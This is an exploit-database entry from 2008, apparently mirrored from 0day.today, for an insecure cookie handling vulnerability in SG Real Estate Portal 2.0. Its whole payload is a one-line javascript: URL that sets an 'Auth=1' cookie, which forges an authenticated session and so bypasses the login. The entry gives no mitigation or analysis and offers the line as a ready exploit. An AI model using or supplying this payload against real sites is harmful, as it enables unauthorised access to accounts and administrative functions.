id: 3809
date: 09/29/2008
title: SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability
author: Stack
cves: 

================================================================
SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability
================================================================



###############################################################################################
[+] SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack            
[+] Greetz : All my freind           
################################################################################################
Exploit:
javascript:document.cookie = "Auth=1; path=/;";



#  0day.today [2023-03-25]  #